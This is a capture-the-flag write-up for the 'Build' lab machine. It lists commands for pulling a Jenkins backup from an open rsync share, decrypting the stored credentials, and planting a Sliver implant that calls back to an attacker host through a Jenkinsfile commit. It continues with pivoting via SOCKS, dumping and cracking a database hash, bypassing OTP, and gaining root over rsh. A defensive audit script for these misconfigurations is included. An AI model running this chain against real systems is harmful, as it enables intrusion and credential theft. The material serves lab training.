Machine (Easy) - Build

Writeup for the Build machine, an easy-level challenge focused on exploiting exposed services and misconfigurations to gain root access.

Writeup Author: BobBuilder
Objective: Gain a root shell on the target by abusing exposed rsync backups, injecting a payload through Jenkins, pivoting into the internal network, and exploiting misconfigured services to escalate privileges.

Category: Machine
Difficulty: Easy
Platform: Windows
Machine Author: xct

User

Enumeration

Identify exposed RPC services and rsync shares:

rpcinfo -p <build_ip>
rsync <build_ip>::

List contents of the backups share:

rsync <build_ip>::backups

Download the Jenkins backup archive:

rsync -avzP <build_ip>::backups/jenkins.tar.gz

Initial Access

Extract the archive and locate stored Jenkins credentials:

cat jenkins_configuration/jobs/build/config.xml

Decrypt the stored Jenkins password:

python invoke.py \
  --master-key ./master.key \
  --hudson-secret-key ./hudson.util.Secret \
  --action decrypt '{AQAAABAAAAAQUNB...}'
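As a defensive check for the two misconfigurations exploited so far (an rsync module that anyone can list and pull, and a credential embedded in a job's config.xml), here is an added audit script that is not part of the original writeup; the rsyncd.conf and config.xml samples are constructed, and the braced secret is a placeholder, not a real Jenkins ciphertext.

```python
import re

# Constructed rsyncd.conf modelled on the exposed "backups" share above.
SAMPLE_RSYNCD_CONF = """\
[backups]
    path = /backups
[scratch]
    path = /srv/scratch
    auth users = backup
    secrets file = /etc/rsyncd.secrets
"""
# Constructed Jenkins job config.xml excerpt with an encrypted secret in the SCM URL.
SAMPLE_JOB_CONFIG = """\
<flow-definition><scm class="hudson.plugins.git.GitSCM">
  <url>http://buildadm:{AQAAABAAAAAQcGxhY2Vob2xkZXI=}@gitea:3000/buildadm/dev.git</url>
</scm></flow-definition>
"""

def parse_rsyncd(conf: str) -> dict:
    """Parse rsyncd.conf into {module: {key: value}}; global keys land in '_global'."""
    modules, current = {"_global": {}}, "_global"
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules[current] = {}
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            modules[current][key.lower()] = value
    return modules

def unauthenticated_modules(conf: str) -> list:
    """Modules with neither 'auth users' nor a 'hosts allow' restriction (module or global)."""
    modules = parse_rsyncd(conf)
    exposed = []
    for name, opts in modules.items():
        if name == "_global":
            continue
        merged = {**modules["_global"], **opts}  # module settings override globals
        if "auth users" not in merged and "hosts allow" not in merged:
            exposed.append(name)
    return exposed

# Jenkins stores encrypted secrets as base64 in braces; the current format begins with a
# 0x01 version byte and a 4-byte IV length, which base64-encodes to the "AQAAAB" prefix.
JENKINS_SECRET_RE = re.compile(r"\{AQAAAB[A-Za-z0-9+/=]+\}")

def embedded_jenkins_secrets(xml_text: str) -> list:
    """Return encrypted Jenkins secrets found in a job config.xml (a clean job has none)."""
    return JENKINS_SECRET_RE.findall(xml_text)
```

Any module reported by unauthenticated_modules is listable and readable by every host that can reach port 873, and any hit from embedded_jenkins_secrets means a credential lives in a job config rather than in the Jenkins credential store.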

Clone the Git repository using the recovered credentials:

git clone 'http://<username>:<password>@<build_ip>:3000/buildadm/dev.git'

Generate a Sliver payload:

sliver > generate --os linux --arch 64bit --mtls <attacker_ip> --format elf --reconnect 60 --save htb_sliver

Modify Jenkinsfile to execute the payload:

stage('Do nothing') {
  steps {
    sh 'chmod +x htb_sliver && ./htb_sliver'
  }
}

Push the malicious commit to trigger code execution:

git add htb_sliver
git commit -am "trigger sliver"
git push

Root

Start a SOCKS proxy from the active Sliver session:

socks5 start

Configure proxychains:

echo 'socks5 127.0.0.1 1081' | sudo tee -a /etc/proxychains4.conf

Scan the internal network via proxy:

proxychains4 nmap -p- 172.18.0.1

Privilege Escalation

Connect to internal MySQL service:

proxychains4 mysql -h 172.18.0.1 -u root

Dump the PowerDNS Admin user table:

USE powerdnsadmin;
SELECT * FROM user;

Crack the retrieved bcrypt hash:

hashcat -a0 -m 3200 '$2b$12$...' rockyou.txt

Access the PowerDNS Admin interface (via proxy):

http://172.18.0.6/login

Bypass OTP using a blank or space character (per known issue).

Update /etc/hosts with DNS mapping:

echo "<admin_ip> admin.build.vl" | sudo tee -a /etc/hosts

Flag Retrieval

Access remote root shell via rsh:

rsh -l root admin.build.vl